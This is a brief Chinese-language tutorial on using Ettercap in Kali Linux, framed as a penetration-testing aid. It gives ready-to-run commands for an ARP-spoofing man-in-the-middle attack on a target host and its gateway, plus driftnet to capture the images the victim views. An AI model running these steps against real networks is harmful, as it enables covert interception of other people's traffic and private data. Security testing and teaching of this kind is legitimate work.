EtterCap是一個基於ARP地址欺騙方式的網絡嗅探工具,主要適用於交換局域網絡。借助於EtterCap嗅探軟件,滲透測試人員可以檢測網絡內明文數據通訊的安全性,及時采取措施,避免敏感的用戶名/密碼等數據以明文的方式進行傳輸。ettercap幾乎是每個滲透測試人員必備的工具之一。(本文已Kali Linux為例)
打開圖像化界面,輸入:ettercap -G 。
選擇嗅探模式:Unified sniffing,設置好要嗅探的網卡(一般都是eth0),點擊確定,開始嗅探。
利用ettercap+driftnet截獲目標主機的圖片數據流。打開一個終端,輸入:ettercap -i eth0 -Tq -M arp:remote //192.168.0.102// //192.168.0.1//,開啟中間人監聽;再打開一個終端,輸入:driftnet -i eth0 ,顯示截獲的圖片。
用戶看的圖片獲取到了